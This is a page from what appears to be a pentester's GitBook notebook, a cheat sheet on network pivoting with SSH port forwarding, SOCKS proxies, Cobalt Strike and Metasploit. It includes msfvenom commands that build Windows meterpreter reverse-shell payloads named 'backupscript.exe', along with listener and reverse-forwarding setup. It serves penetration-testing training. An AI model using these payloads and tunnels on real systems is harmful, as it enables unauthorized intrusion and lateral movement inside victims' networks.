Martian Defense NoteBook
  • Martian Defense Notebook
  • Training and Career
    • Keeping it Real for Beginners
    • Reading and Repos
    • Media
    • Guides
      • Cybersecurity Roadmaps
      • Cybersecurity Training Topics
      • AppSec Training Pathway
      • Interview Checklist
    • Platforms
      • General
      • Offensive Security
      • Defensive Security
      • CTF Sites
      • Live Vulnerable Sites
    • Entrepreneurship Roadmaps
      • Consulting
      • Starting a Business
  • Technical Resources
    • Offensive-Cybersecurity
      • Application Security
      • General
      • Recon + OSINT
      • Infrastructure Pentesting
      • Cloud Pentesting
      • Wordlists
      • Social Engineering
      • Mobile Pentesting
      • Container Security
      • Blockchain
    • Defensive-Cybersecurity
    • General Cybersecurity
      • Cybersecurity Operating Systems
    • Coding/Programming
    • Reverse Engineering
    • AI and ML
  • Notes
    • Product Security Engineering
      • DevSecOps
        • Docker
          • How to Dockerize Applications with Docker Compose (Using SQLite and Flask)
      • SAST/SCA
        • How to setup a GitHub Action for Code Security analysis
        • JavaScript Security Analysis
        • Java Security 101
        • Tools
        • CodeQL for Beginners
      • Product Security Hardening
      • Threat Modeling
      • PHP Security
    • AppSec Testing
      • Checklists
        • WEB APP PENTESTING CHECKLIST
        • API Testing Checklist
        • Android Pentesting Checklist
        • IoS Pentesting Checklist
        • Thick Client Pentesting Checklist
        • Secure Code Review Checklist
      • Targeted Test Cases
        • Part 1
        • Part 2
      • Common Web Attack and Prevention List
      • Ports and associated Vectors
      • DNS
      • Web Tools
      • Command Injection Testing
      • JWTs and JSON
    • Security Research
      • Publishing CVEs
      • Threat Intelligence
      • Shodan Dork Cheatsheet
      • Github Dorks
      • Bug Bounty
        • Bug Bounty Programs
      • Forums
    • Coding/Programming
      • Secure Coding Practices Checklist
      • JavaScript
      • Python
        • Quick Notes
        • Python Basics for Pentesters
        • Python Snippets
        • XML Basics with Python
      • Golang
        • Theory
        • Security
        • Modules
        • Entry Points
        • File Forensics
        • Cryptography and Encoding
        • Golang Snippets
      • PHP
        • Setup
        • Syntax
        • Variables and Data Types
        • Control Structures
        • Arrays
        • Functions
        • OOP Concepts
        • Database Integration
        • Handling HTTP Methods
        • Session Management
        • File Uploads
        • Email Function
        • Error Handling
        • Advanced Topics and Best Practices
    • Network Security
      • Domain Trust Enumeration
      • Bleeding Edge Vulnerabilities
      • Post-Exploitation
      • Access Control Lists and Entries (ACL & ACE)
      • Credentialed Enumeration
      • Password Attacks
        • Internal Password Spraying
        • Remote Password Attacks
        • Linux Local Password Attacks
        • Windows Local Password Attacks
        • Windows Lateral Movement
      • PowerView
      • Pivoting, Tunneling and Forwarding
        • Advanced Tunneling Methods
        • Dynamic Port Forwarding (SSH + Socks)
        • Port Forwarding Tools
        • SoCat
      • Linux Privilege Escalation
      • Windows Privesc
        • OS Attacks
        • Windows User Privileges
        • Windows Group Privileges
        • Manual Enumeration
        • Credential Theft
      • Kerberos Attacks
        • Kerberos Quick Reference Sheet
    • Cloud Security Testing
    • Defensive Security
      • Splunk
        • Basic Queries
        • Dashboards
      • Forensics
        • Volatility
      • WireShark filters
    • Governance, Risk, Compliance
      • Vulnerability Management Lifecycle
    • Capture-the-Flag Training
      • Vulnerable Machine Checklist
      • Reverse Engineering Checklist
      • Mobile Checklist
      • Forensics Checklist
      • Binary Exploitation
      • Cryptography Checklist
    • Reporting
    • PowerShell
    • Linux Basics
    • Basic IT Tasks
  • Digital Privacy and Hygiene
    • Personal Information Removal Services
    • De-Googling Android
    • DNS Services
    • Privacy References
    • Opsec
  • RedPlanet Labs
    • PyGOAT
    • OWASP Juice Shop
Powered by GitBook
On this page
  • Local Port Forward SSH
  • SSH Tunneling over SOCKS Proxy
  • Reverse Port Forwarding SSH
  • Cobalt Tunneling & Port Forwarding
  • MSF Socks Proxy
  • Metasploit Autoroute
  • Metasploit Port Forwarding
  • Metasploit Reverse Forwarding
  1. Notes
  2. Network Security
  3. Pivoting, Tunneling and Forwarding

Dynamic Port Forwarding (SSH + Socks)

Local Port Forward SSH

It sends the data from <local-port> to <remote-port on the target server.

# Local Port -> Can be any port
# Remote Port -> The port where the target service is listening on
ssh -L <local-port>:127.0.0.1:<remote-port>

# Confirm Port Forwarding
netstat -antp | grep <localport>

# Forwarding Several Ports
ssh -L <local-port>:localhost:<remote-port> <local-port>:localhost:<remote-port> <user>@<IP>

SSH Tunneling over SOCKS Proxy

# SSH Command
ssh -D 1080 <user>@<IP>

# Check Proxychains Conf File
/etc/proxychains.conf
socks4 127.0.0.1 1080

Reverse Port Forwarding SSH

# Generate Reverse Shell, with the IP of the internal host.
msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080

# Set lport 8000
# set lhost 127.0.0.1

# Reverse Port Forward
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN

Cobalt Tunneling & Port Forwarding

# Socks4 Proxy
socks 1080

# socks5
socks 1080 socks5 disableNoAuth socks_user socks_password enableLogging

# Reverse Port Forward
rportfwd 

MSF Socks Proxy

use auxiliary/server/socks_proxy
set srvport 1080
set servhost 0.0.0.0
set version 4a

# Verify Proxy runs
jobs

Metasploit Autoroute

use post/multi/manage/autoroute
set session <session id>
set subnet <ip>
run

# Shorter Method
run autoroute -s <ip>/24

Metasploit Port Forwarding

portfwd add -l <local-port> -p <remote-port> -r <ip>

Metasploit Reverse Forwarding

portfwd add -R -l <local-port> -p <remote-port> -L <tun0>

# Setup Listener
set payload windows/x64/meterpreter/reverse_tcp
set lport <value -l>
set lhost 0.0.0.0
run

# Create Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<pivot-ip> -f exe -o backupscript.exe LPORT=<remote-port>
PreviousAdvanced Tunneling MethodsNextPort Forwarding Tools

Last updated 5 months ago